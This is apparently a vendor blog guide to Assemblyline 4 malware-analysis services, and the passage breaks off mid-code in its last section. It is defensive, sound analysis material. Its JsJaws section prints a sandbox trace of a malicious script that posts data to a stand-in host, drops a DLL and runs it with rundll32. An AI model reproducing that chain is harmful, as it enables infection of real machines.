Assemblyline 4 Services: A Guided Tour

April 10, 2024

Assemblyline 4 is a popular open-source private malware repository. Arguably the most powerful feature of Assemblyline 4 is the capability to chain many malware analysis services together for comprehensive and highly customisable artifact triage and analysis. 

Each Assemblyline service performs a specific function (similar to the “microservices” pattern often used in software architecture). These services can be chained together to process files, extract relevant information, and evaluate potential threats. Services can also run many times over on extracted content to peel away multiple layers of obfuscation. This gives us deep insight into binaries, documents, and other file artefacts while keeping the samples local to our Assemblyline instance and using the best-of-breed analysis tools for understanding them. It also allows us to score each file to assess whether it’s malicious, suspicious, or benign.

In this guide, we’ll dive into Assemblyline’s most useful managed (built-in) services you can incorporate into your analysis workflows.

Who would use Assemblyline 4 and why?

Organisations using Assemblyline 4 often fall into one or more of these categories:

  • They deal with a large volume of unique malware and want to keep the samples in a segregated environment.
  • They don’t wish to upload samples to public or shared tools like VirusTotal because the samples may be highly sensitive or attributable to the organisation.
  • They deal with many maldocs: Word, PDF, or Excel documents designed to exploit the workstation of whoever opens the attachment. Maldocs are often highly targeted and can reveal the identity of the targeted organisation as well as PII of individuals within it.

If you’re considering Assemblyline for your organisation, check out our hosted Assemblyline 4 service, MalwareZoo. MalwareZoo gives you access to powerful and private malware analysis and storage capabilities (including all the built-in services featured in this guide) without the operations and infrastructure pain.

Service Categories

Windows Binary Analysis

APIVector Service

Construct a representation called an ApiVector from the common Windows API calls a binary references, then use it to analyse and classify Windows binaries.

ApiVector is especially useful when comparing an incoming sample against a collection of known ApiVectors. These vectors can be sourced from Malpedia, and the service can pull updates from it regularly. Users can also generate their own ApiVectors, typically as a CSV file.

ApiVector offers parameters for matching ApiVectors, including minimum confidence and minimum Jaccard score, which determine the level of matching and reporting for detected malware families.
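To make the Jaccard score concrete, here is a minimal sketch that compares plain sets of API names and keeps the families that reach a threshold. It is a simplification under stated assumptions: real ApiVectors are compact, weighted vectors rather than plain sets, and the function names, family names, sample data and threshold value below are all hypothetical.

```python
def jaccard(a: set[str], b: set[str]) -> float:
    """Jaccard score: size of the intersection divided by size of the union."""
    if not a and not b:
        return 0.0
    return len(a & b) / len(a | b)


def matching_families(sample_apis, known_families, min_jaccard=0.40):
    """Return (family, score) pairs at or above the threshold, best match first."""
    scored = ((name, jaccard(sample_apis, apis)) for name, apis in known_families.items())
    hits = [(name, score) for name, score in scored if score >= min_jaccard]
    return sorted(hits, key=lambda hit: hit[1], reverse=True)


# Hypothetical data for illustration only.
sample = {"CreateFileW", "WriteFile", "InternetOpenA", "InternetReadFile"}
families = {
    "family_a": {"CreateFileW", "WriteFile", "InternetOpenA", "RegSetValueExA"},
    "family_b": {"MessageBoxA", "ExitProcess"},
}
matches = matching_families(sample, families)
print(matches)
```

Raising the threshold trades recall for fewer false positives, which is the same trade-off the service's minimum Jaccard setting exposes.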

Service configuration options available for the APIVector service:

# Parameters for matching apivector
# minimum confidence in the apivector match to do anything with it
"min_confidence": 50,

# min jaccard score to report as implant family
# from https://journal.cecyf.fr/ojs/index.php/cybin/article/view/2 , you can set this depending on your
# tolerance for false positives.
# Even if set very high, FPs are still possible for samples that share a lot of statically linked code
# * 0.18 leads to a TPR/FPR of 90.18% and 9.45%
# * 0.22 leads to a TPR/FPR of 89.10% and 4.74% (closest distance to the (0,1) point)
# * 0.32 leads to a TPR/FPR of 86.55% and 0.99%
# * 0.55 leads to a TPR/FPR of 80.72% and 0.09%
"min_jaccard": 0.40

CAPA Service

The CAPA Service is essentially a wrapper around the core functionality of mandiant/capa, offering streamlined access to its capabilities. capa detects capabilities in executable files. For example, it might suggest that a given file is a backdoor, is capable of installing services, or relies on HTTP to communicate.

For submission parameters and configuration, users can specify the renderer, which dictates the output format. Currently, there are three renderers available: "simple," "default," and "verbose," each offering varying levels of information presentation. The "default" renderer mirrors CAPA’s default output, showcasing information in three tables: ATT&CK, MBC, and other capabilities.

ViperMonkey Service

ViperMonkey emulates VBA code execution, allowing analysts to understand how a potentially malicious macro behaves without executing it in a live environment. Its primary purpose is to analyse and deobfuscate malicious VBA macros found in Microsoft Office files such as Word, Excel and PowerPoint documents. The service also tracks intermediate IOCs generated during macro execution, including dropped files and injected shellcode bytes.

Android APK Analysis

APKaye Service

APKaye helps analysts to uncover insights about Android applications. It decompiles and inspects Android APKs, providing information on network indicators and details extracted from the APK manifest file. It combines three tools under the hood to achieve this:

  1. Apktool, which disassembles the APK file for analysis.
  2. Dex2jar, optionally used to convert .dex objects within the APK into JAR files for further analysis with Assemblyline services like Espresso.
  3. Aapt, which analyses the metadata of the APK, including examining the manifest for permissions, determining the SDK target, and components used, as well as extracting and analysing different strings present in the APK.
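As an illustration of the manifest details mentioned above, the sketch below pulls the package name, target SDK and requested permissions out of text in the style of `aapt dump badging` output. The sample text is an assumption written by hand for this example, not captured from a real run, and `summarise_badging` is a hypothetical helper rather than anything APKaye exposes.

```python
import re

# Illustrative text in the style of `aapt dump badging` output (assumed format).
BADGING = """\
package: name='com.example.app' versionCode='1' versionName='1.0'
sdkVersion:'21'
targetSdkVersion:'33'
uses-permission: name='android.permission.INTERNET'
uses-permission: name='android.permission.READ_SMS'
"""


def summarise_badging(text: str) -> dict:
    """Extract a few manifest-derived fields from badging-style text."""
    package = re.search(r"^package: name='([^']+)'", text, re.MULTILINE)
    target = re.search(r"^targetSdkVersion:'(\d+)'", text, re.MULTILINE)
    permissions = re.findall(r"^uses-permission:\s*(?:name=)?'([^']+)'", text, re.MULTILINE)
    return {
        "package": package.group(1) if package else None,
        "target_sdk": int(target.group(1)) if target else None,
        "permissions": permissions,
    }


summary = summarise_badging(BADGING)
print(summary)
```

A permission list like this is often the quickest triage signal: an app that claims to be a torch but requests SMS access deserves a closer look.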

Deobfuscation

Batchdeobfuscator Service

A Python script to deobfuscate a batch script that is obfuscated with string substitution and escape character techniques.
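The two techniques named above can be sketched in a few lines. This is a deliberately simplified illustration, not the service's implementation: it removes caret escape characters and expands `%NAME:~start,length%` substring references using a caller-supplied environment. The `deobfuscate` function, the `ALPHA` variable and the sample command are hypothetical, and negative offsets and other `cmd.exe` parsing rules are not handled.

```python
import re


def deobfuscate(line: str, env: dict[str, str]) -> str:
    """Undo caret escaping and variable substring substitution in one batch line."""
    # 1. Drop caret escape characters, keeping the character each one escapes.
    line = re.sub(r"\^(.)", r"\1", line)

    # 2. Expand %NAME:~start,length% substring references.
    def substring(match: re.Match) -> str:
        value = env.get(match.group(1).upper(), "")
        start, length = int(match.group(2)), int(match.group(3))
        return value[start:start + length]

    line = re.sub(r"%(\w+):~(\d+),(\d+)%", substring, line)

    # 3. Expand plain %NAME% references, leaving unknown variables untouched.
    return re.sub(r"%(\w+)%", lambda m: env.get(m.group(1).upper(), m.group(0)), line)


env = {"ALPHA": "abcdefghijklmnopqrstuvwxyz"}
obfuscated = "c^m^d /c e^c^h^o %ALPHA:~7,1%%ALPHA:~8,1%"
clear = deobfuscate(obfuscated, env)
print(clear)
```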

DeobfuScripter Service

A static script de-obfuscator designed to extract obfuscated Indicators of Compromise (IOCs).

FrankenStrings Service

This service scans for ASCII and Unicode strings that may be indicators of compromise (IOCs).

It utilises Balbuzard's bbcrack tool for XOR transformation, searching for specific IOCs. It also extracts Unicode, Hex, and ASCII-Hex strings, particularly useful for potential shellcode. Finally, it tags IOC pattern matches.
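The idea behind XOR-based IOC hunting can be shown with a small stand-in. The sketch below extracts printable ASCII runs and brute-forces single-byte XOR keys until a URL pattern appears. It does not use bbcrack, which supports many more transforms, and the function names, URL pattern and sample data are assumptions made for illustration.

```python
import re

URL_PATTERN = re.compile(rb"https?://[\w.-]+(?:/[\w./-]*)?")


def ascii_strings(data: bytes, min_len: int = 6) -> list[bytes]:
    """Return runs of printable ASCII that are at least min_len bytes long."""
    return re.findall(rb"[\x20-\x7e]{%d,}" % min_len, data)


def xor_bruteforce(data: bytes) -> list[tuple[int, bytes]]:
    """Try every single-byte XOR key and return (key, url) pairs that reveal a URL."""
    hits = []
    for key in range(1, 256):
        decoded = bytes(b ^ key for b in data)
        hits.extend((key, m.group(0)) for m in URL_PATTERN.finditer(decoded))
    return hits


# Hypothetical sample: a URL hidden with XOR key 0x5A between junk bytes.
secret = b"http://example.com/payload.bin"
blob = b"\x00\x01junk" + bytes(b ^ 0x5A for b in secret) + b"\xff\xfe"
hits = xor_bruteforce(blob)
print(hits)
```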

Overpower Service

Overpower de-obfuscates and assesses PowerShell files. It employs modified open-source tools for this purpose, including PSDecode (a PowerShell script used to de-obfuscate encoded PowerShell scripts) and PowerShellProfiler, which de-obfuscates and normalises script content, then profiles it to identify behavioural indicators.
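One of the simplest layers such tools peel away is PowerShell's `-EncodedCommand` parameter, which carries a Base64-encoded UTF-16LE script. The sketch below decodes that single layer using only the standard library. It is an illustration of the encoding, not of how PSDecode or PowerShellProfiler work internally, and `decode_encoded_command` is a hypothetical helper that recognises only a few common spellings of the parameter.

```python
import base64
import re
from typing import Optional


def decode_encoded_command(command_line: str) -> Optional[str]:
    """Decode the Base64 payload passed via -e, -enc or -EncodedCommand."""
    match = re.search(
        r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]+)", command_line, re.IGNORECASE
    )
    if not match:
        return None
    # PowerShell expects the payload to be UTF-16LE text encoded as Base64.
    return base64.b64decode(match.group(1)).decode("utf-16-le")


payload = base64.b64encode("Write-Host 'hello'".encode("utf-16-le")).decode("ascii")
decoded = decode_encoded_command(f"powershell.exe -NoP -enc {payload}")
print(decoded)
```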

Linux Binary Analysis

ELF Service

This service uses the LIEF library to analyse executable Linux files and provides metadata about the file. LIEF is a cross-platform library for parsing, modifying and abstracting ELF, PE and MachO formats. It also provides an API to access and potentially modify internal structures.
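To give a feel for the kind of metadata involved, the following standard-library sketch reads a few fields from the start of an ELF header. It is a stand-in for illustration only and does not use LIEF, which parses the whole file. The lookup tables cover just a handful of common values, and `read_elf_header` is a hypothetical helper.

```python
import struct

ELF_CLASSES = {1: "ELF32", 2: "ELF64"}
ELF_TYPES = {1: "relocatable", 2: "executable", 3: "shared object", 4: "core"}
ELF_MACHINES = {3: "x86", 40: "ARM", 62: "x86-64", 183: "AArch64"}


def read_elf_header(data: bytes) -> dict:
    """Read the identification bytes plus e_type and e_machine from an ELF header."""
    if len(data) < 20 or data[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    ei_class, ei_data = data[4], data[5]
    byte_order = "<" if ei_data == 1 else ">"  # EI_DATA: 1 = little-endian, 2 = big-endian
    # e_type and e_machine are 16-bit fields at offsets 16 and 18 in both ELF32 and ELF64.
    e_type, e_machine = struct.unpack_from(byte_order + "HH", data, 16)
    return {
        "class": ELF_CLASSES.get(ei_class, "unknown"),
        "endianness": "little" if ei_data == 1 else "big",
        "type": ELF_TYPES.get(e_type, hex(e_type)),
        "machine": ELF_MACHINES.get(e_machine, hex(e_machine)),
    }


# Hand-built 20-byte header fragment: 64-bit, little-endian, shared object, x86-64.
fragment = b"\x7fELF" + bytes([2, 1, 1, 0]) + bytes(8) + struct.pack("<HH", 3, 62)
header = read_elf_header(fragment)
print(header)
```

For a file on disk, passing the first 20 bytes read in binary mode is enough for this helper.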

ELFPARSER Service

This service wraps the elfparser library and makes the output easily viewable in the Assemblyline UI.

ELF-based malware is malware built as ELF (Executable and Linkable Format) binaries. ELF is a common format used for executables, object code, and shared libraries in Unix-like operating systems, such as Linux. This service provides static analysis and quick access to information about ELF binaries, along with insight into whether a given binary is suspicious or malicious.

The ELFPARSER CLI provides detailed output, including the score of analysed files, scoring reasons, and detected capabilities. It can identify network functions, process manipulation functions, environment variable manipulation, shell commands, packed files, hard-coded IPv4 addresses, anti-debug techniques, and dropper functionality.

Compiling ELFPARSER:

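# Replace $(path_to_extracted_elfparser_source_code) with the path to your extracted elfparser source
docker run -u 0 --rm -v $(path_to_extracted_elfparser_source_code):/tmp/elfparser -it cccs/assemblyline-v4-service-base /bin/bash
# Then, inside the container:
apt update
apt install -y cmake libboost-all-dev build-essential
mkdir /tmp/elfparser/build
cd /tmp/elfparser/build
cmake ..
make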

Email Analysis

EmlParser Service

A wrapper service around GOVCERT-LU/eml_parser, used to extract information from .eml files, including attachments (hashes and filenames), address fields, the path of receiving servers, the email subject, and a list of URLs parsed from the email content. The output can easily be converted to JSON.

Example JSON output from EmlParser:

{
  "body": [
    {
      "content_header": {
        "content-language": [
          "en-US"
        ]
      },
      "hash": "6c9f343bdb040e764843325fc5673b0f43a021bac9064075d285190d6509222d"
    }
  ],
  "header": {
    "received_src": null,
    "from": "john.doe@example.com",
    "to": [
      "test@example.com"
    ],
    "subject": "Sample EML",
    "received_foremail": [
      "test@example.com"
    ],
    "date": "2013-04-26T11:15:47+00:00",
    "header": {
      "content-language": [
        "en-US"
      ],
      "received": [
        "from localhost\tby mta.example.com (Postfix) with ESMTPS id 6388F684168\tfor <test@example.com>; Fri, 26 Apr 2013 13:15:55 +0200"
      ],
      "to": [
        "test@example.com"
      ],
      "subject": [
        "Sample EML"
      ],
      "date": [
        "Fri, 26 Apr 2013 11:15:47 +0000"
      ],
      "message-id": [
        "<F96257F63EAEB94C890EA6CE1437145C013B01FA@example.com>"
      ],
      "from": [
        "John Doe <john.doe@example.com>"
      ]
    },
    "received_domain": [
      "mta.example.com"
    ],
    "received": [
      {
        "with": "esmtps id 6388f684168",
        "for": [
          "test@example.com"
        ],
        "by": [
          "mta.example.com"
        ],
        "date": "2013-04-26T13:15:55+02:00",
        "src": "from localhost by mta.example.com (postfix) with esmtps id 6388f684168 for <test@example.com>; fri, 26 apr 2013 13:15:55 +0200"
      }
    ]
  }
}
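For readers who want to see the same kind of extraction without installing anything, here is a rough standard-library sketch. It is a stand-in for illustration and does not use eml_parser: it reads the subject and address fields, finds URLs in the plain-text body, and hashes each attachment. The `summarise_eml` helper, the URL regex and the in-memory sample message are all assumptions made for this example.

```python
import hashlib
import re
from email import message_from_bytes, policy
from email.message import EmailMessage


def summarise_eml(raw: bytes) -> dict:
    """Pull a few triage-relevant fields out of a raw RFC 5322 message."""
    msg = message_from_bytes(raw, policy=policy.default)
    body = msg.get_body(preferencelist=("plain",))
    text = body.get_content() if body is not None else ""
    return {
        "subject": str(msg["subject"]),
        "from": str(msg["from"]),
        "to": str(msg["to"]),
        "urls": re.findall(r"https?://[^\s<>\"']+", text),
        "attachments": [
            {
                "filename": part.get_filename(),
                "sha256": hashlib.sha256(part.get_payload(decode=True)).hexdigest(),
            }
            for part in msg.iter_attachments()
        ],
    }


# Build a small message in memory so the sketch needs no sample file.
sample = EmailMessage()
sample["From"] = "John Doe <john.doe@example.com>"
sample["To"] = "test@example.com"
sample["Subject"] = "Sample EML"
sample.set_content("Please review http://example.com/redir.php today.")
sample.add_attachment(b"hello", maintype="application", subtype="octet-stream", filename="note.bin")

summary = summarise_eml(sample.as_bytes())
print(summary)
```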

Java Analysis

Espresso Service

This service analyses JAR files by extracting, decompiling and analysing all classes for malicious behaviour using the CFR decompiler tool. Potentially malicious files are included in the results for analyst review.

Network Analysis

Suricata Service

The Suricata Service scans network capture files using signatures and extracts files from the network capture. It uses three rulesets by default:

  1. Emerging Threats Open
  2. Snortv3 Community
  3. URLhaus

Document Analysis (Microsoft Office)

Oletools Service

Analyse Microsoft OLE (Object Linking and Embedding) and XML documents for metadata extraction and network information, while also identifying anomalies. Oletools utilises the Python libraries py-oletools and hachoir to provide a comprehensive assessment of potentially malicious content.

For each analysed file Oletools provides individual macro analysis (including SHA256 hashes and suspicious strings detection), extraction of embedded document streams, identification of malicious Class Identifiers, and detection of suspicious XML/OLE stream features like FrankenStrings IOC Patterns, Adobe Flash content, Base64 and Hex encoded content, and MSO DDE Links.

XLMMacroDeobfuscator Service

Decode obfuscated XLM macros (also known as Excel 4.0 macros). A wrapper service for XLMMacroDeobfuscator which uses an internal XLM emulator to interpret the macros without fully executing the code.

Document Analysis (PDF)

PDFId Service

The PDFId service wraps PDFId (Version 2.7) and PDFParser (Version 7.4) to extract metadata and objects from PDF files.

PDFId reports the PDF header string, counts of various elements (objects, streams, etc.) and metadata such as modification date, creation date, etc.

PDFParser reports the number of different PDF elements (Comment, XREF, etc.), extracts PDF elements like comments, trailer, startXref, and extracts suspicious elements flagged by PDFId plugins.
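The element counting described above can be approximated with a few regular expressions. The sketch below is a simplified illustration, not PDFId itself: it counts a short, hand-picked list of keywords in raw PDF bytes and does not handle obfuscated names (for example hex-escaped characters) or compressed object streams. The keyword list, the `count_keywords` helper and the sample document are assumptions.

```python
import re

KEYWORDS = ["obj", "endobj", "stream", "endstream", "/Page", "/JS", "/JavaScript", "/OpenAction"]


def count_keywords(pdf: bytes) -> dict[str, int]:
    """Count whole-keyword occurrences in raw PDF bytes."""
    counts = {}
    for keyword in KEYWORDS:
        # Names such as "/Page" may directly follow another token, so only bare
        # keywords such as "obj" need a guard against a preceding letter ("endobj").
        prefix = rb"" if keyword.startswith("/") else rb"(?<![A-Za-z])"
        pattern = prefix + re.escape(keyword.encode("ascii")) + rb"(?![A-Za-z0-9])"
        counts[keyword] = len(re.findall(pattern, pdf))
    return counts


# Tiny hand-written fragment for illustration; not a complete, valid PDF.
SAMPLE_PDF = b"""%PDF-1.7
1 0 obj
<< /Type /Catalog /Pages 2 0 R /OpenAction 3 0 R >>
endobj
3 0 obj
<< /S /JavaScript /JS (app.alert(1)) >>
endobj
"""

counts = count_keywords(SAMPLE_PDF)
print(counts)
```

A document with `/OpenAction` and `/JavaScript` but few pages is a classic triage signal, which is why counts like these are worth surfacing early.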

PeePDF Service

A wrapper around the PeePDF library used to report file information, heuristics, and other items of interest about PDFs, including CVE identifiers, embedded files, JavaScript and URL detection. The ultimate goal of PeePDF is to give security researchers all the information and tools they might possibly need when analysing PDF files.

Metadata Analysis

Characterize Service

Characterize is a file information extraction service. It divides the file into partitions and calculates visual entropy for each partition, and it uses hachoir-metadata and exiftool commands to extract metadata from the file.
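Per-partition entropy is easy to sketch. The example below computes Shannon entropy in bits per byte for equal-sized slices of a buffer. It is a minimal illustration under stated assumptions: the partition count, rounding and function names are hypothetical and are not taken from the service.

```python
import math
from collections import Counter


def shannon_entropy(chunk: bytes) -> float:
    """Entropy in bits per byte: 0.0 for constant data, 8.0 for uniformly spread bytes."""
    if not chunk:
        return 0.0
    total = len(chunk)
    return sum((n / total) * math.log2(total / n) for n in Counter(chunk).values())


def partition_entropy(data: bytes, partitions: int = 4) -> list[float]:
    """Split data into roughly equal partitions and return the entropy of each."""
    size = max(1, math.ceil(len(data) / partitions))
    return [round(shannon_entropy(data[i:i + size]), 2) for i in range(0, len(data), size)]


# 256 zero bytes followed by every byte value exactly once.
data = bytes(256) + bytes(range(256))
profile = partition_entropy(data, partitions=2)
print(profile)
```

Regions with entropy close to 8 bits per byte often indicate compressed or encrypted content, which is why an entropy profile is a useful first look at a packed sample.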

MetaPeek Service

Checks the metadata of a submitted file for anomalies, with a focus on common techniques that spam writers use to lure victims into clicking on embedded files. This includes checking for things like double file extensions, empty file names, excessive use of whitespace and bi-directional Unicode control characters.
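The checks listed above are simple enough to sketch directly. The following is an illustrative approximation, not MetaPeek's own logic: the extension lists, the whitespace threshold and the `filename_anomalies` helper are all assumptions.

```python
import re

# Unicode bidirectional embedding, override and isolate control characters.
BIDI_CONTROLS = set("\u202a\u202b\u202c\u202d\u202e\u2066\u2067\u2068\u2069")
# Hypothetical extension lists, for illustration only.
EXECUTABLE_EXTENSIONS = {"exe", "scr", "js", "vbs", "bat", "lnk"}
DOCUMENT_EXTENSIONS = {"pdf", "doc", "docx", "xls", "xlsx", "txt", "jpg", "png"}


def filename_anomalies(name: str) -> list[str]:
    """Return a list of suspicious traits found in a file name."""
    findings = []
    parts = [part.strip() for part in name.lower().split(".")]
    if len(parts) >= 3 and parts[-1] in EXECUTABLE_EXTENSIONS and parts[-2] in DOCUMENT_EXTENSIONS:
        findings.append("double file extension")
    if "." in name and not name.rsplit(".", 1)[0].strip():
        findings.append("empty file name")
    if re.search(r"\s{5,}", name):
        findings.append("excessive whitespace")
    if BIDI_CONTROLS.intersection(name):
        findings.append("bidirectional control character")
    return findings


print(filename_anomalies("invoice.pdf      .exe"))
print(filename_anomalies("annex\u202efdp.exe"))
```

The second example uses a right-to-left override so that a viewer may render the name as if it ended in "exe.pdf", which is the lure this kind of check is meant to catch.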

Script Analysis (JavaScript)

JsJaws Service

This service combines elements from six different open-source projects to comprehensively analyse and score JavaScript malware using signatures. The core components of the service are:

  1. Malware Jail, which provides a sandbox for semi-automatic malware analysis, deobfuscation, and payload extraction.
  2. Box.js, a sandbox for studying JavaScript malware.
  3. JS-X-Ray, for static analysis via SAST scanning.
  4. Synchrony, to deobfuscate JavaScript obfuscated with obfuscator.io.
  5. WScript Emulator, which emulates and traces Windows Script Host functionality.
  6. GootLoaderAutoJsDecode, for automatic decoding of Gootloader files using static analysis.

Malware Jail example output:

bash@linux# node jailme.js malware/example.js
11 Jan 00:06:24 - Malware sandbox ver. 0.2
11 Jan 00:06:24 - ------------------------
11 Jan 00:06:24 - Sandbox environment sequence: env/eval.js,env/wscript.js
11 Jan 00:06:24 - Malware files: malware/example.js
11 Jan 00:06:24 - Output file for sandbox dump: sandbox_dump_after.json
11 Jan 00:06:24 - Output directory for generated files: output/
11 Jan 00:06:24 - ==> Preparing Sandbox environment.
11 Jan 00:06:24 -  => Executing: env/eval.js
11 Jan 00:06:24 - Preparing sandbox to intercept eval() calls.
11 Jan 00:06:24 -  => Executing: env/wscript.js
11 Jan 00:06:24 - Preparing sandbox to emulate WScript environment.
11 Jan 00:06:24 - ==> Executing malware file(s).
11 Jan 00:06:24 -  => Executing: malware/example.js
11 Jan 00:06:24 - ActiveXObject(WScript.Shell)
11 Jan 00:06:24 - Created: WScript.Shell[1]
11 Jan 00:06:24 - WScript.Shell[1].ExpandEnvironmentStrings(%TEMP%)
11 Jan 00:06:24 - ActiveXObject(MSXML2.XMLHTTP)
11 Jan 00:06:24 - Created: MSXML2.XMLHTTP[2]
11 Jan 00:06:24 - MSXML2.XMLHTTP[2].open(POST,http://EXAMPLE.COM/redir.php,false)
11 Jan 00:06:24 - MSXML2.XMLHTTP[2].setRequestHeader(Content-Type, application/x-www-form-urlencoded)
11 Jan 00:06:24 - MSXML2.XMLHTTP[2].send(iTlOlnxhMXnM=0.588860877091065&jndj=IT0601)
11 Jan 00:06:24 - MSXML2.XMLHTTP[2] Not sending data, if you want to interract with remote server, set --down=y
11 Jan 00:06:24 - MSXML2.XMLHTTP[2] Calling onreadystatechange() with dummy data
11 Jan 00:06:24 - ActiveXObject(ADODB.Stream)
11 Jan 00:06:24 - Created: ADODB_Stream[3]
11 Jan 00:06:24 - ADODB_Stream[3].Open()
11 Jan 00:06:24 - ADODB_Stream[3].Write(str) - 10001 bytes
11 Jan 00:06:24 - ADODB_Stream[3].SaveToFile(%TEMP%\57020551.dll, 2)
11 Jan 00:06:24 - WScript.Shell[1].Exec(rundll32 %TEMP%\57020551.dll, DllRegisterServer)
11 Jan 00:06:24 - ADODB_Stream[3].Close()
11 Jan 00:08:42 - ==> Script execution finished, dumping sandbox environment to a file.
11 Jan 00:08:42 - Saving: output/_TEMP__49629482.dll
11 Jan 00:08:42 - Saving: output/_TEMP__38611354.pdf
11 Jan 00:08:42 - Generated file saved
11 Jan 00:08:42 - Generated file saved
11 Jan 00:08:42 - The sandbox context has been  saved to: sandbox_dump_after.json

IOC Extraction

ConfigExtractor Service

Extract malware configurations, such as IP addresses, URLs, and domains, by using the ConfigExtractor Python library. Works with multiple extraction frameworks, including MWCP and CAPE, with MACO output.

Python usage example for the ConfigExtractor Service:

import logging

from configextractor.main import ConfigExtractor

# Create a logger to track what the library is doing
logger = logging.getLogger()
logger.handlers = [logging.StreamHandler()]
logger.setLevel('DEBUG')

# Instantiate the class with path(s) to extractors
# Attaching a logger gives some insight into what's going on if parser detection is the issue
cx = ConfigExtractor(["/path/to/extractors/"], logger=logger)

# List all parsers actively detected and loaded into the instance
# cx.parsers.keys() lists all the relative module paths to the parsers
# The value of each key is an Extractor object containing details for running the extractor (i.e. venv location, YARA rule, etc.)
print([cx.get_details(p)['name'] for p in cx.parsers.values()])

# Run all loaded parsers against the sample
results = cx.run_parsers('/path/to/sample')

# Output raw results to stdout; each should be organised by the parser that generated the output
print(results)

Floss Service

Floss uses FireEye Labs Obfuscated String Solver (FLOSS) to identify obfuscated strings, including stacked strings, in Windows executable files.

It uses several different modules for string extraction, including static strings (in ASCII and UNICODE), decoded strings, and stacked strings. The output also includes strings matching IOC patterns of interest.

Safelist Service

Designate a set of files as safe, preventing them from being scanned by Assemblyline in the future. The safelist can be populated either through predefined safelist sources or by users marking files as safe directly within the Assemblyline UI.

You can set up a safelist using a SQL database (similar to NSRL's format, with FILE and PKG tables) or a CSV file. You can also define trusted distributors using regular expressions to ensure the trustworthiness of your hashes.

Signature Analysis

AntiVirus Service

Integrates with popular AV products like Kaspersky, Skyhigh, ESET, Bitdefender, WithSecure, and Sophos, supporting either ICAP or HTTP requests. Users can integrate with additional antivirus products by providing details like the product name, IP address, port, update period, and optional file size limit. You can also manage false positives by revising the scores in the Assemblyline interface or by identifying and adjusting any signatures causing issues.

Source: CybercentreCanada/assemblyline-service-antivirus. Managing a false positive in the AntiVirus Service.

YARA / TagCheck Service

Two services in one: YARA and TagCheck. The YARA service runs the YARA application against all file types. It currently supports various external modules such as Dotnet, ELF, Hash, Magic, Math, and PE. The YARA rules adhere to the CCCS standard.

TagCheck is a post-processing service that compares all tags generated by other services to a signature set using YARA signatures. It utilises the same code as the YARA service but populates the YARA externals features with all the tags generated by other services.

By default, the TagCheck service runs a small set of signatures mainly geared toward dynamic analysis results analysis (say that three times fast!), with its signature format following the CCCS standard but with added external features to reference Assemblyline tags inside signatures.

Example TagCheck signature format:

rule UPX_Packer_PE_Section {
    meta:
        version = "1.0"
        description = "Identifies UPX packer by PE section names"
        source = "CCCS"
        author = "assemblyline_devs@CCCS"
        status = "RELEASED"
        sharing = "TLP:WHITE"
        category = "TECHNIQUE"
        technique = "packer:UPX"
        mitre_att = "T1045"
    condition:
        al_file_pe_sections_name matches /UPX[0-9]/
}

VirusTotal Service

Check and optionally submit files/URLs to VirusTotal for analysis (BYO free or paid API key) using the v3 REST API. Because doing so will transfer the file externally to VirusTotal, initiating a request for analysis will prompt the user and warn them that the file and related metadata will leave the Assemblyline system.
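The difference between checking and submitting matters for privacy: a hash lookup sends only the SHA256, not the file. The sketch below builds, but does not send, a v3 file-report request using the standard library. The `build_hash_lookup` helper and the placeholder API key are assumptions for illustration, and this is not how the Assemblyline service itself is implemented.

```python
import hashlib
import urllib.request

VT_FILES_ENDPOINT = "https://www.virustotal.com/api/v3/files/"


def build_hash_lookup(sample: bytes, api_key: str) -> urllib.request.Request:
    """Build a GET request for the report of a file, identified only by its SHA256."""
    sha256 = hashlib.sha256(sample).hexdigest()
    return urllib.request.Request(VT_FILES_ENDPOINT + sha256, headers={"x-apikey": api_key})


# Placeholder key; the request is only constructed here, never sent.
request = build_hash_lookup(b"hello", api_key="YOUR_API_KEY")
print(request.get_method(), request.full_url)
```

Passing the request to `urllib.request.urlopen` would perform the lookup. Even a hash-only query reveals to a third party that you hold the file, which is part of what the warning prompt is about.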

Sandboxing

CAPE Service

Submit files to a CAPEv2 deployment and receive parsed reports (users are responsible for setting up the CAPE nest and victim machines). The service retrieves the analysis results from detonating a submitted file on a victim machine and displays a summarised version of the report in the Assemblyline UI. The full report is also available in the Assemblyline UI as a supplementary file. Files that are unpacked and saved to disk are fed back into Assemblyline.

Miscellaneous

Intezer Service

Fetch the Intezer Analyze report for the SHA256 of a submitted file. Optionally, if the SHA256 is not found on the Intezer Analyze instance, the service will submit the file. The service was created by x1mus with support from Sorakurai and reynas at NVISO, and is now maintained by the Canadian Centre for Cyber Security.

This service calls the Intezer Analyze API with the hash of the file and returns the results. Prior to making the request, the user will be warned that their file or metadata related to their file will leave the Assemblyline system.

PixAxe Service

An image analysis service combining Optical Character Recognition (OCR) via Tesseract and optional steganography modules (recommended for academic use only). The OCR process can be configured to look for specific terms, such as terms commonly related to ransomware.

Example term inclusion and exclusion for the PixAxe service:

config:
    ocr:
        ransomware:
            include: ['bad1', 'bad2', ...]
            exclude: ['bank account']
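One way to read this configuration is that `include` adds terms to a default list and `exclude` removes terms from it. The sketch below models that reading and then matches the resulting terms against OCR output. The default term list, both function names and the sample text are hypothetical, and the merge semantics are an assumption rather than a statement of how the service is implemented.

```python
# Hypothetical default term list; the service ships its own.
DEFAULT_TERMS = {"ransomware": ["bitcoin", "decrypt", "bank account"]}


def effective_terms(defaults: dict, overrides: dict) -> dict:
    """Apply include/exclude overrides to the default terms for each category."""
    terms = {}
    for category, default_list in defaults.items():
        override = overrides.get(category, {})
        extra = [t for t in override.get("include", []) if t not in default_list]
        excluded = set(override.get("exclude", []))
        terms[category] = [t for t in list(default_list) + extra if t not in excluded]
    return terms


def matched_terms(ocr_text: str, terms: dict) -> dict:
    """Return the terms from each category that appear in the OCR text."""
    lowered = ocr_text.lower()
    return {
        category: [t for t in term_list if t.lower() in lowered]
        for category, term_list in terms.items()
    }


overrides = {"ransomware": {"include": ["bad1", "bad2"], "exclude": ["bank account"]}}
terms = effective_terms(DEFAULT_TERMS, overrides)
hits = matched_terms("Send BITCOIN to decrypt your files. Bank account 123.", terms)
print(terms, hits)
```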

Swiffer Service

A wrapper around the Python pyswf library to extract metadata and perform anomaly detection on 'audiovisual/flash' files (SWF).

TorrentSlicer Service

Extract metadata, calculated data (torrent type, number of pieces, last piece size, torrent size), and per-file path, length and MD5 sum information from torrent files.
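The calculated values follow directly from the bencoded `info` dictionary of a torrent. The sketch below includes a minimal bencode decoder and derives the torrent type, total size, number of pieces and last piece size. It is an illustration only: the output field names and the hand-built sample are hypothetical, and the decoder does no validation.

```python
def bdecode(data: bytes, pos: int = 0):
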